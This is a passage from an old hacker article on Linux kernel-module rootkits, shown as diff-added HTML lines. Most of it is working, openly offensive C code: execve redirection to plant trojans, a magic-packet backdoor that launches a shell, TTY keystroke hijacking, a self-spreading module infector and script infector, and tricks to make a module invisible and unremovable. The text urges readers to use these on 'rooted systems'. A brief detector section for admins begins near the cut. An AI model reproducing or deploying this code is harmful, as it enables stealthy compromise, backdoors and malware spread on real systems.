+This is a way to set the flag field. Now it is clear why this approach is a bit
+too complicated for an easy practical use.
+
+<H4><A NAME="II.5.2."></A>5.2 How to redirect Execution of files</h4>
+
+In certain situations it could be very interesting to redirect the execution
+of a file. Those files could be /bin/login (like plaguez did), tcpd, etc.. This
+would allow you to insert any trojan without problem of checksum checks on those
+files (you don't need to change them). So let's again search the responsible
+systemcall. sys_execve(...) is the one we need. Let's take a look at plaguez
+way of redirection (the original idea came from  halflife) :<br>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+/*must be defined because of syscall macro used below*/
+int errno;
+
+/*we define our own systemcall*/
+int __NR_myexecve;
+
+/*we must use brk*/
+static inline _syscall1(int, brk, void *, end_data_segment);
+
+int (*orig_execve) (const char *, const char *[], const char *[]);
+
+/*here plaguez's user -> kernel space transition specialized for strings
+is better than memcpy_fromfs(...)*/
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+ char *tmp = src;
+ int compt = 0;
+
+ do {
+  dest[compt++] = __get_user(tmp++, 1);
+ }
+ while ((dest[compt - 1] != '\0') && (compt != n));
+ return dest;
+}
+
+
+/*this is something like a systemcall macro called with SYS_execve, the
+asm code calls int 0x80 with the registers set in a way needed for our own
+__NR_myexecve systemcall*/
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    long __res;
+    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) 
+                     (filename)), "c"((long) (argv)),                      "d"((long) (envp)));
+    return (int) __res;
+}
+
+
+int hacked_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ char *test;
+ int ret, tmp;
+ char *truc = "/bin/ls";        /*the file we *should* be executed*/
+ char *nouveau = "/bin/ps";     /*the new file which *will* be executed*/
+ unsigned long mmm;
+
+ test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
+ /*get file which a user wants to execute*/
+ (void) strncpy_fromfs(test, filename, strlen(truc));
+ test[strlen(truc)] = '\0';
+ /*do we have our truc file ?*/
+ if (!strcmp(test, truc)) 
+ {
+  kfree(test);
+  mmm = current->mm->brk;
+  ret = brk((void *) (mmm + 256));
+  if (ret < 0)
+   return ret;
+  /*set new program name (the program we want to execute instead of /bin/ls or 
+  whatever)*/
+  memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
+  /*execute it with the *same* arguments / environment*/
+  ret = my_execve((char *) (mmm + 2), argv, envp);
+  tmp = brk((void *) mmm);
+ } else {
+  kfree(test);
+  /*no the program was not /bin/ls so execute it the normal way*/
+  ret = my_execve(filename, argv, envp);
+ }
+ return ret;
+}
+
+int init_module(void)                /*module setup*/
+{
+ /*the following lines choose the systemcall number of our new myexecve*/
+ __NR_myexecve = 200;
+ while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+  __NR_myexecve--;
+
+ orig_execve = sys_call_table[SYS_execve];
+ if (__NR_myexecve != 0) 
+ {
+  sys_call_table[__NR_myexecve] = orig_execve; 
+  sys_call_table[SYS_execve] = (void *) hacked_execve;
+ }
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_execve]=orig_execve;                                      
+}
+</xmp>
+
+When you loaded this module, every call to /bin/ls will just execute /bin/ps.
+The following list gives you some ideas how to use this redirection of execve :
+<ul>
+<li>trojan /bin/login with a hacker login (how plaguez suggests)<br>
+<li>trojan tcpd to open a rootshell on a certain port, or to filter its logging
+  behaviour (remember CERT advisory on a trojan TCPD version)<br>
+<li>trojan inetd for a root shell<br>
+<li>trojan httpd, sendmail, ... any server you can think of, for a rootshell, by
+  issuing a special magic string<br>
+<li>trojan tools like tripwire, L6<br>
+<li>other system security relevant tools<br>
+</ul>
+There are thousands of other intersting programs to 'trojan', just use your 
+brain.
+
+<H3><A NAME="II.6."></A>6.  Network (Socket) related Hacks</h3>
+
+The network is the hacker's playground. So let's look at something which can
+help us.  
+
+<H4><A NAME="II.6.1."></A>6.1 How to controll Socket Operations</h4> 
+
+There are many things you can do by controlling Socket Operations. plaguez gave
+us a nice backdoor. He just intercepts the sys_socketcall systemcall, waiting
+for a packet with a certain length and a certain contents. So let's take a look
+at his hacked systemcall (I will only show the hacked_systemcall, because the
+rest is equal to every other LKM mentioned in this section) :
+
+<xmp>
+int hacked_socketcall(int call, unsigned long *args)
+{
+ int ret, ret2, compt;
+
+ /*our magic size*/
+ int MAGICSIZE=42;
+
+ /*our magic contents*/
+ char *t = "packet_contents";
+ unsigned long *sargs = args;
+ unsigned long a0, a1, mmm;
+ void *buf;
+
+ /*do the call*/
+ ret = (*o_socketcall) (call, args);
+
+ /*did we have magicsize & and a recieve ?*/
+  if (ret == MAGICSIZE && call == SYS_RECVFROM) 
+  {
+   /*work on arguments*/
+   a0 = get_user(sargs);
+   a1 = get_user(sargs + 1);
+   buf = kmalloc(ret, GFP_KERNEL);
+   memcpy_fromfs(buf, (void *) a1, ret);
+   for (compt = 0; compt < ret; compt++)
+    if (((char *) (buf))[compt] == 0)
+     ((char *) (buf))[compt] = 1;
+    /*do we have magic_contents ?*/
+    if (strstr(buf, mtroj)) 
+    {
+     kfree(buf);
+     ret2 = fork();
+    if (ret2 == 0) 
+    {
+     /*if so execute our proggy (shell or whatever you want...) */
+     mmm = current->mm->brk;
+     ret2 = brk((void *) (mmm + 256));
+     memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);
+
+     /*plaguez's execve implementation -> see 4.2*/
+     ret2 = my_execve((char *) mmm + 2, NULL, NULL);
+    }
+   }
+  }
+ return ret;
+}
+</xmp>
+
+Ok, as always I added some comments to the code, which is a bit ugly, but working.
+The code intercepts every sys_socketcall (which is responsible for everything
+concerning socket-operations see I.2). Inside the hacked systemcall the code
+first issues a normal systemcall. After that the return value and call variables
+are checked. If it was a receive Socketcall and the 'packetsize' (...nothing to
+do with TCP/IP packets...) is ok it will check the contents which was received.
+If it can find our magic contents, the code can be sure,that we (hacker) want to
+start the backdoor program. This is done by my_execve(...).<br>
+In my opinion this approach is very good, it would also be possible to wait
+for a speciel connect / close pattern, just be creative.<br> 
+Please remember that the methods mentioned above need a service listing on a
+certain port, because the receive function is only issued by daemons receiving
+data from an established connection. This is a disadvantage, because it could be
+a bit suspect for some paranoid admins out there. Test those backdoor LKM ideas
+first on your system to see what will happen. Find your favourite way of
+backdoor'ing the sys_socketcall, and use it on your rooted systems.
+
+<H3><A NAME="II.7."></A>7. Ways to TTY Hijacking</h3>
+
+TTY hijacking is very interesting and also something used since a very very long
+time. We can grab every input from a TTY we specify throug its major and minor
+number. In Phrack 50 halflife published a really good LKM doing this. The
+following code is ripped from his LKM. It should show every beginner the basics
+of TTY hijacking though its no complete implementation, you cannot use it in any
+useful way, because I did <i>not</i> implement a way of logging the TTY input made
+by the user. It's just for those of you who want to understand the basics, so
+here we go :
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+#include <asm/io.h>
+#include <sys/sysmacros.h>
+
+
+int errno;
+
+/*the TTY we want to hijack*/
+int tty_minor = 2;
+int tty_major = 4;
+
+extern void* sys_call_table[];
+
+/*we need the write systemcall*/
+static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
+
+void *original_write;
+
+/* check if it is the tty we are looking for */
+int is_fd_tty(int fd)
+{
+ struct file *f=NULL;
+ struct inode *inode=NULL;
+ int mymajor=0;
+ int myminor=0;
+
+ if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
+  return 0;
+ mymajor = major(inode->i_rdev);
+ myminor = minor(inode->i_rdev);
+ if(mymajor != tty_major) return 0;
+ if(myminor != tty_minor) return 0;
+  return 1;
+}
+
+/* this is the new write(2) replacement call */
+extern int new_write(int fd, char *buf, size_t count)
+{
+ int r;
+ char *kernel_buf;
+
+ if(is_fd_tty(fd))
+ {
+  kernel_buf = (char*) kmalloc(count+1, GFP_KERNEL);   
+  memcpy_fromfs(kernel_buf, buf, count);
+
+  /*at this point you can output buf whereever you want, it represents
+  every input on the TTY device referenced by the chosen major / minor
+  number
+  I did not implement such a routine, because you will see a complete &
+  very good TTY hijacking tool by halflife in appendix A */
+
+  kfree(kernel_buf);
+ }
+ sys_call_table[SYS_write] = original_write;
+ r = write(fd, buf, count); 
+ sys_call_table[SYS_write] = new_write;
+ if(r == -1) return -errno;
+  else return r;
+}
+
+int init_module(void)                   
+{
+ /*you should know / understand this...*/
+ original_write = sys_call_table[SYS_write];
+ sys_call_table[SYS_write] = new_write;
+ return 0;
+}
+
+
+void cleanup_module(void)
+{
+ /*no more hijacking*/
+ sys_call_table[SYS_write] = original_write;
+}
+</xmp>
+
+
+The comments should make this code easy to read.The general idea is to intercept
+sys_write (see 4.2) and filtering the fd value as I mentioned in 4.2. After
+checking fd for the TTY we want to snoop, get the data written and write it
+to some log (not implemented in the example above).There are several ways where
+you can store the logs.halflife used a buffer (accessible through an own device)
+which is a good idea (he can also control his hijack'er using ioctl-commands
+on his device).<br>
+I personally would recommand storing the logs in hidden (through LKM) file,
+and making the controlling through some kind of IPC. Take the way which works
+on your rooted system.<br>
+
+<H3><A NAME="II.8."></A>8. Virus writing with LKMs</h3>
+
+Now we will leave the hacking part for a second and take a look at the 
+world of virus coding (the ideas discussed here could also be
+interesting for hackers, so read on...). I will concentrate this discussion
+on the LKM infector made by Stealthf0rk/SVAT. In appendix A you will get the 
+complete source, so this section will only discuss important techniques and 
+functions. This LKM requires a Linux system (it was tested on a 2.0.33 system)
+and kerneld installed (I will explain why).<br>
+First of all you have to know that this LKM infector does not infect normal
+elf <i>executables</i> (would also be possible,I will come to that point later->7.1),
+it only infects <i>modules</i>, which are loaded / unloaded. This loading / unloading
+is often managed by kerneld (see I.7). So imagine a module infected with the
+virus code; when loading this module you also load the virus LKM which uses
+hiding features (see 8). This virus module intercepts the sys_create_module
+and sys_delete_module (see I.2) systemcalls for further infection. Whenever
+a module is unloaded on that system it is infected by the new sys_delete_module
+systemcall. So every module requested by kerneld (or manually) will be infected
+when unloaded.<br>
+You could imagine the following scenario for the first infection :
+<ul>
+<li>admin is searching a network driver for his new interface card (ethernet,...)<br>
+<li>he starts searching the web <br>
+<li>he finds a driver module which should work on his system & downloads it<br>
+<li>he installs the module on his system [the module <i>is</i> infected]<br>
+--> the infector is installed, the system is compromised<br>
+</ul>
+Of course, he did not download the source, he was lazy and took the risks using
+a binary file. So admins <i>never</i> trust any binary files (esp. modules).
+So I hope you see the chances / risks of LKM infectors, now let's look a bit
+closer at the LKM infector by SVAT.<br>
+Imagine you have the source for the virus LKM (a simple module, which intercepts
+sys_create_module / sys_delete_module and some other [more tricky] stuff). The
+first question would be how to infect an existing module (the host module). Well
+let's do some experimenting. Take two modules and 'cat' them together like
+
+<xmp>
+# cat module1.o >> module2.o
+</xmp>
+
+After this try to insmod the resulting module2.o (which also includes module1.o
+at its end).
+
+<xmp>
+# insmod module2.o
+</xmp>
+
+Ok it worked, now check which modules are loaded on your system
+
+<xmp>
+# lsmod
+Module         Pages    Used by
+module2        1	0
+</xmp>
+
+So we know that by concatenating two modules the first one (concerning object
+code) will be loaded, the second one will be ignored. And there will be no error
+saying that insmod can not load corrupted code or so.<br>
+With this in mind, it should be clear that a host module could be infected by
+
+<xmp>
+cat host_module.o >> virus_module.o
+ren virus_module.o host_module.o
+</xmp>
+
+This way loading host_module.o will load the virus with all its nice LKM
+features. But there is one problem, how do we load the actual host_module ? It
+would be very strange to a user / admin when his device driver would do nothing. 
+Here we need the help of kerneld. As I said in I.7 you can use kerneld to load
+a module. Just use request_module("module_name") in your sources.This will force
+kerneld to load the specified module. But where do we get the original host
+module from ? It is packed in host_module.o (together with virus_module.o). So
+after compiling your virus_module.c to its objectcode you have to look at its
+size (how many bytes). After this you know where the original host_module.o will
+begin in the packed one (you must compile the virus_module two times : the first
+one to check the objectcode size, the second one with the source changed
+concerning objectsize which must be hardcoded...). After these steps your
+virus_module should be able to extract the original host_module.o from the
+packed one. You have to save this extracted module somewhere, and load it via
+request_module("orig_host_module.o"). After loading the original host_module.o
+your virus_module (which is also loaded from the insmod [issued by user, or
+kerneld]) can start infecting any loaded modules.<br>
+Stealthf0rk (SVAT) used the sys_delete_module(...) systemcall for doing the
+infection, so let's take a look at his hacked systemcall (I only added some
+comments) :
+
+<xmp>
+/*just the hacked systemcall*/
+int new_delete_module(char *modname)
+{
+ /*number of infected modules*/
+ static int infected = 0;
+ int retval = 0, i = 0;
+ char *s = NULL, *name = NULL;
+ 
+ /*call the original sys_delete_module*/       
+ retval = old_delete_module(modname); 
+
+  if ((name = (char*)vmalloc(MAXPATH + 60 + 2)) == NULL)
+  return retval;
+ 
+ /*check files to infect -> this comes from hacked sys_create_module; just
+ a feature of *this* LKM infector, nothing generic for this type of virus*/
+ for (i = 0; files2infect[i][0] && i < 7; i++) 
+ {
+  strcat(files2infect[i], ".o"); 
+  if ((s  = get_mod_name(files2infect[i])) == NULL) 
+  {
+   return retval;
+  }
+  name = strcpy(name, s);
+  if (!is_infected(name)) 
+  {
+   /*this is just a macro wrapper for printk(...)*/
+   DPRINTK("try 2 infect %s as #%d\n", name, i);
+   /*increase infection counter*/
+   infected++;
+   /*the infect function*/
+   infectfile(name);
+  }
+  memset(files2infect[i], 0, 60 + 2);
+ } /* for */
+ /* its enough */
+ /*how many modules were infected, if enough then stop and quit*/
+ if (infected >= ENOUGH)
+  cleanup_module();
+ vfree(name);
+ return retval;
+}
+</xmp>
+
+Well there is only one function interesting in this systemcall: infectfile(...).
+So let's examine that function (again only some comments were added by me) :
+
+<xmp>
+int infectfile(char *filename)
+{
+ char *tmp = "/tmp/t000";
+ int in = 0, out = 0;
+ struct file *file1, *file2;
+ 
+ /*don't get confused, this is a macro define by the virus. It does the
+ kernel space -> user space handling for systemcall arguments(see I.4)*/
+ BEGIN_KMEM
+ /*open objectfile of the module which was unloaded*/
+ in = open(filename, O_RDONLY, 0640);
+ /*create a temp. file*/
+ out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);
+ /*see BEGIN_KMEM*/
+ END_KMEM
+ 
+ DPRINTK("in infectfile: in = %d out = %d\n", in, out);
+ if (in <= 0 || out <= 0)
+  return -1;
+ file1 = current->files->fd[in];
+ file2 = current->files->fd[out];
+ if (!file1 || !file2)
+  return -1;
+ /*copy module objectcode (host) to file2*/
+ cp(file1, file2);
+ BEGIN_KMEM
+ file1->f_pos = 0;
+ file2->f_pos = 0;
+ /* write Vircode [from mem] */
+ DPRINTK("in infetcfile: filenanme = %s\n", filename);
+ file1->f_op->write(file1->f_inode, file1, VirCode, MODLEN);
+ cp(file2, file1);
+ close(in);
+ close(out);
+ unlink(tmp);
+ END_KMEM
+ return 0;
+}        
+</xmp>
+I think the infection function should be quite clear.<br>
+There is only thing left which I think is necessary to discuss : How does
+the infected module first start the virus, and load the original module (we know
+the theory, but how to do it in reality) ?<br>
+For answering this question lets take a look at a function called 
+load_real_mod(char *path_name, char* name) which manages that problem :
+
+<xmp>
+/* Is that simple: we disinfect the module [hide 'n seek]
+ * and send a request to kerneld to load
+ * the orig mod. N0 fuckin' parsing for symbols and headers
+ * is needed - cool.
+ */
+int load_real_mod(char *path_name, char *name)
+{   	
+ int r = 0, i = 0;		
+ struct file *file1, *file2;
+ int in =  0, out = 0; 
+
+ DPRINTK("in load_real_mod name = %s\n", path_name);
+ if (VirCode)
+  vfree(VirCode);
+ VirCode = vmalloc(MODLEN);
+ if (!VirCode)
+   return -1;
+ BEGIN_KMEM
+ /*open the module just loaded (->the one which is already infected)*/
+ in = open(path_name, O_RDONLY, 0640);
+ END_KMEM
+ if (in <= 0)
+  return -1;
+ file1 = current->files->fd[in];
+ if (!file1)
+  return -1;
+ /* read Vircode [into mem] */
+ BEGIN_KMEM
+ file1->f_op->read(file1->f_inode, file1, VirCode, MODLEN);
+ close(in);
+ END_KMEM
+ /*split virus / orig. module*/
+ disinfect(path_name);
+ /*load the orig. module with kerneld*/
+ r = request_module(name);
+ DPRINTK("in load_real_mod: request_module = %d\n", r);
+ return 0;
+}   	
+</xmp>        
+
+It should be clear *why* this LKM infector need kerneld now, we need to load the
+original module by requesting it with request_module(...).
+I hope you understood this very basic journey through the world of LKM infectors
+(virus). The next sub sections will show some basic extensions / ideas concering
+LKM infectors.
+
+<H4><A NAME="II.8.1."></A>8.1  How a LKM virus can infect any file (not just modules)</h4>
+
+Please don't blame me for not showing a working example of this idea, I just
+don't have the time to implement it at the moment (look for further releases).
+As you saw in II.4.2 it is possible to catch the execute of every file using
+an intercepted sys_execve(...) systemcall. Now imagine a hacked systemcall which
+appends some data to the program that is going to be executed. The next time
+this program is started, it first starts our added part and then the original
+program (just a basic virus scheme). We all know that there are some existing
+Linux / unix viruses out there, so why don't we try to use LKMs infect our elf
+executables not just modules.We could infect our executables,in a way that they
+check for UID=0 and then load again our infection module... I hope you
+understood the general idea. <br>
+I have to admit, that the modification needed to elf files is quite tricky, but
+with enough time you could do it (it was done several times before, just take a
+look at existing Linux viruses).<br> 
+First of all you have to check for the file type which is going to be execute 
+by sys_execve(...). There are several ways to do it; one of the fastest is to
+read some bytes from the file and checking them against the ELF string. After
+this you can use write(...) / read(...) / ... calls to modify the file, look at
+the LKM infector to see how it does it.<br>
+My theory would stay theory without any proof, so I present a very easy and
+useless LKM *script* infector. You cannot do anything virus like with it, it just
+infects a script with certain commands and nothing else; no real virus features.<br>
+I show you this example as a concept of LKMs infecting any file you execute.
+Even Java files could be infected, because of the features provided by the Linux
+kernel. Here comes the little LKM script infector :
+
+<xmp>
+#define __KERNEL__
+#define MODULE
+
+/*taken from the original LKM infector; it makes the whole LKM a lot easier*/
+#define BEGIN_KMEM {unsigned long old_fs=get_fs();set_fs(get_ds());
+#define END_KMEM   set_fs(old_fs);}
+
+#include <linux/version.h>
+#include <linux/mm.h>
+#include <linux/unistd.h>
+#include <linux/fs.h>
+#include <linux/types.h>
+#include <asm/errno.h>
+#include <asm/string.h>
+#include <linux/fcntl.h>
+#include <sys/syscall.h>
+#include <linux/module.h>
+#include <linux/malloc.h>
+#include <linux/kernel.h>
+#include <linux/kerneld.h>
+
+int __NR_myexecve;
+
+extern void *sys_call_table[];
+
+int (*orig_execve) (const char *, const char *[], const char *[]);
+
+int (*open)(char *, int, int);
+int (*write)(unsigned int, char*, unsigned int);
+int (*read)(unsigned int, char*, unsigned int);
+int (*close)(int);
+
+
+/*see II.4.2 for explanation*/
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    long __res;
+    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp)));
+    return (int) __res;
+}
+
+/*infected execve systemcall + infection routine*/
+int hacked_execve(const char *filename, const char *argv[], const char *envp[])
+{
+ char *test, j;
+ int ret;
+ int host = 0;
+
+ /*just a buffer for reading up to 20 files (needed for identification of
+ execute file*/
+ test = (char *) kmalloc(21, GFP_KERNEL);
+
+ /*open the host script, which is going to be executed*/
+ host=open(filename, O_RDWR|O_APPEND, 0640);
+
+ BEGIN_KMEM
+
+ /*read the first 20 bytes*/
+ read(host, test, 20);  
+
+ /*is it a normal shell script (as you see, you can modify this for *any*
+ executable*/
+ if (strstr(test, "#!/bin/sh")!=NULL)
+ { 
+  /*a little debug message*/
+  printk("<1>INFECT !\n"); 
+  /*we are friendly and attach a peaceful command*/
+  write(host, "touch /tmp/WELCOME", strlen("touch /tmp/WELCOME"));
+ }
+ END_KMEM
+ /*modification is done, so close our host*/
+ close(host);
+ /*free allocated memory*/ 
+ kfree(test);
+ /*execute the file (the file is execute WITH the changes made by us*/
+ ret = my_execve(filename, argv, envp);
+ return ret;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ __NR_myexecve = 250;
+ while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+  __NR_myexecve--;
+ orig_execve = sys_call_table[SYS_execve];
+ if (__NR_myexecve != 0) 
+ {
+  printk("<1>everything OK\n");
+  sys_call_table[__NR_myexecve] = orig_execve; 
+  sys_call_table[SYS_execve] = (void *) hacked_execve;
+ }
+
+ /*we need some functions*/
+ open = sys_call_table[__NR_open]; 
+ close = sys_call_table[__NR_close];     
+ write = sys_call_table[__NR_write];
+ read = sys_call_table[__NR_read];
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_execve]=orig_execve;                                      
+}
+</xmp>
+
+This is too easy to waste some words on it. Of course, this module does
+<i>not</i> need kerneld for spreading (interesting for kernel without kerneld
+support). <br>
+I hope you got the idea on infecting any executable, this is a very strong
+method of killing large systems.
+
+<H4><A NAME="II.8.2."></A>8.2  How can a LKM virus help us to get in</h4>
+
+As you know virus coders are not hackers, so what about interesting features for
+hackers. Think about this problem (only ten seconds), you should realize, that
+a whole system could be yours by introducing a trojan (infected) LKM.<br>
+Remember all the nice hacks we discussed till now.Even without trojans you could 
+hack a system with LKMs. Just use a local buffer overflow to load a LKM in your
+home directoy. Believe me, it is easier to infect a system with a real good LKM
+than doing the same stuff as root again and again. It's more elagent to let the
+LKM make the work for you. Be CREATIVE...
+
+<H3><A NAME="II.9."></A>9. Making our LKM invisible & unremovable </h3>
+
+Now it's time to start talking about the most important / interesting Hack I 
+will present. This idea comes from plaguez's LKM published in Phrack (other 
+people like Solar Designer discussed this before...).<br>
+So far we are able to hide files, processes, directories, and whatever we
+want. But we <i>cannot</i> hide our own <i>LKM</i>. Just load a LKM and take a look at
+/proc/modules. There are many ways we can solve this problem. The first solution
+could be a partial file hiding (see II.4.3). This would be easy to implement,
+but there is a better more advanced and secure way. Using this technique you
+must also intercept the sys_query_module(...) systemcall. An example of this
+approach can be seen in A-b.<br>
+As I explained in I.1 a module is finally loaded by issuing a init_module(...)
+systemcall which will start the module's init function. init_module(...) gets
+an argument : struct mod_routines *routines.  This structure contains very
+important information for loading the LKM. It is possible for us to manipulate
+some data from this structure in a way our module will have no name and no
+references. After this the system will no longer show our LKM in /proc/modules,
+because it ignores LKMs with no name and a refernce count equal to 0. The
+following lines show how to access the part of mod_routines, in order to hide
+the module.<br>
+
+<xmp>
+/*from Phrack & AFHRM*/
+int init_module()
+{
+  register struct module *mp asm("%ebp");   // or whatever register it is in
+  *(char*)mp->name=0;
+  mp->size=0;
+  mp->ref=0;
+ ...
+</xmp>
+
+This code trusts in the fact that gcc did not manipulate the ebp register
+because we need it in order to find the right memory location. After finding
+the structure we can set the structure's name and references members to 0 which
+will make our module invisible and also unremovable, because you can only remove
+LKMs which the kernel knows, but our module is unknow to the kernel.<br>
+Remember that this trick only works if you use gcc in way it does not touch the
+register you need to access for getting the structure.You must use the following
+gcc options :
+
+<xmp>
+#gcc -c -O3 -fomit-frame-pointer module.c 
+</xmp>
+
+fomit-frame-pointer says cc not to keep frame pointer in registers for functions
+that don't need one. This keeps our register clean after the function call of
+init_module(...), so that we can access the structure.<br>
+In my opinion this is the most important trick, because it helps us to develope
+hidden LKMs which are also unremovable.
+
+<H3><A NAME="II.10."></A>10. Other ways of abusing the Kerneldaemon</h3>
+
+In II.8 you saw one way of abusing kerneld. It helped us to spread the LKM
+infector. It could also be helpful for our LKM backdoor (see II.5.1). Imagine
+the socketcall loading a module instead of starting our backdoor shellscript or
+program. You could load a module adding an entry to passwd or inetd.conf. After
+loading this second LKM you have many possibilities of changing systemfiles. 
+Again, be creative.  
+
+<H3><A NAME="II.11."></A>11. How to check for presents of our LKM</h3>
+
+We learned many ways a module can help us to subvert a system. So imagine you
+code yourself a nice backdoor tool (or take an existing) which isn't implemented
+in the LKM you use on that system; just something like pingd, WWW remote shell,
+shell, .... How can you check after logging in on the system that your LKM is 
+still working? Imagine what would happen if you enter a session and the admin is
+waiting for you without your LKM loaded (so no process hiding etc.). So you 
+start doing you job on that system (reading your own logs, checking some mail
+traffic and so on) and every step is monitored by the admin. Well no good 
+situation, we must know that our LKM is working with a simple check.<br>
+I suppose the following way is a good solution (although there may be many other
+good ones):
+<ul>
+<li> implement a special systemcall in your module<br>
+<li> write a little user space program checking for that systemcall<br>
+</ul>
+Here is a module which implements our 'check systemcall' :
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+#define SYS_CHECK 200
+
+extern void* sys_call_table[];
+
+
+int sys_check()
+{
+ return 666;    
+}
+
+int init_module(void)                /*module setup*/
+{
+ sys_call_table[SYS_CHECK]=sys_check;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{}
+</xmp>
+
+If you issue a systemcall with the number 200 in eax we should get a return of
+666. So here is our user space program checking for this :
+
+<xmp>
+#include <linux/errno.h>
+#include <sys/syscall.h>
+#include <errno.h>
+
+extern void *sys_call_table[];
+
+int check()
+{   
+ __asm__("movl $200,%eax
+         int $0x80");
+}
+
+main()
+{
+ int ret;
+ ret = check();
+ if (ret!=666) 
+  printf("Our module is *not* present !!\n");
+ else
+  printf("Our module is present, continue...\n");
+}
+</xmp>
+
+
+In my opinion this is one of the easiest ways to check for presents of our LKM,
+just try it.
+
+
+<u><b>
+<H2>III. Soltutions (for admins)</H2>
+</u></b>
+<P><P>
+
+
+<H3><A NAME="III.1."></A>1. LKM Detector Theory & Ideas</h3>
+
+I think it is time to help admins securing their system from hostile LKMs.<br>
+Before explaining some theories remember the following for a secure system :<br>
+<ul>
+<li> never install <i>any</i> LKMs you don't have the sources for (of course, this is
+  also relevant for normal executables)<br>
+<li> if you have the sources, check them (if you can). Remember the tcpd trojan 
+  problem. Large software packets are mostly quite complex to understand, but
+  if you need a very secure system you should analyse the source code.<br>
+</ul>
+Even if you follow those tips it could be possible that an intruder activates an
+LKM on your system (overflows etc.). <br>
+So what about a LKM logging every module loaded, and denying every load attempt
+from a directory different from a secure one (to avoid simple overflows; that's no
+perfect way...). The logging can be easily done by intercepting the
+create_module(...) systemcall. The same way you could check for the directory
+the loaded module comes from. <br>
+It would also be possible to deny any module loading, but this is a very bad way,
+because you really need them. So what about modifying module loading in a way
+you can supply a password, which will be checked in your intercepted
+create_module(...). If the password is correct the module will be loaded, if not
+it will be dropped.<br>
+It should be clear that you have to hide your LKM to make it unremovable. So
+let's take a look at some prototype implemantations of the logging LKM and the
+password protected create_module(...) systemcall.<br>
+
+<H4><A NAME="III.1.1."></A>1.1  Practical Example of a prototype Detector</h4>
+
+Nothing to say about that simple implementation, just intercept
+sys_create_module(...) and log the names of modules which were loaded.
+
+<xmp>
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+
+int (*orig_create_module)(char*, unsigned long);
+
+
+int hacked_create_module(char *name, unsigned long size)
+{
+ char *kernel_name;
+ char hide[]="ourtool";
+ int ret;
+ 
+ kernel_name = (char*) kmalloc(256, GFP_KERNEL);
+ memcpy_fromfs(kernel_name, name, 255);
+
+ /*here we log to syslog, but you can log where you want*/
+ printk("<1> SYS_CREATE_MODULE : %s\n", kernel_name);
+ 
+ ret=orig_create_module(name, size);
+ return ret;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_create_module=sys_call_table[SYS_create_module];
+ sys_call_table[SYS_create_module]=hacked_create_module;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_create_module]=orig_create_module;                                      
+}
+
+</xmp>
+
+This is all you need, of course you should add the lines required for hiding the
+module, but this is no problem. After making it unremovable this way, a hacker
+can only modify the log file, but you could also save your logs, to a file
+unaccessible for the hacker (see II.1 for required tricks).
+Of course you can also intercept sys_init_module(...)which would also show every
+module, that's just a matter of taste.
+
+
+<H4><A NAME="III.1.2."></A>1.2  Practical Example of a prototype password protected create_module(...)</h4>
+
+
+This subsection will deal with the possibility to add authentication to module
+loading. We need two things to manage this task :
+<ul>
+<li> a way to check module loading (easy)<br>
+<li> a way to authenticate (quite difficult)<br>
+</ul>
+The first point is very easy to code, just intercept sys_create_module(...) and
+check some variable, which tells the kernel wether this load process is legal.
+But how to do authentication. I must admit that I did not spend many seconds on
+thinking about this problem, so the solution is more than bad, but this is a LKM
+article, so use your brain, and create something better. My way to do it, was
+to intercept the stat(...) systemcall, which is used if you type any command,and
+the system needs to search it. So just type a password as command and the LKM
+will check it in the intercepted stat call [I know this is more than insecure;
+even a Linux starter would be able to defeat this authentication scheme, but
+(again) this is not the point here...]. Take a look at my implemtation (I ripped
+lots of from existing LKMs like the one by plaguez...):<br>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
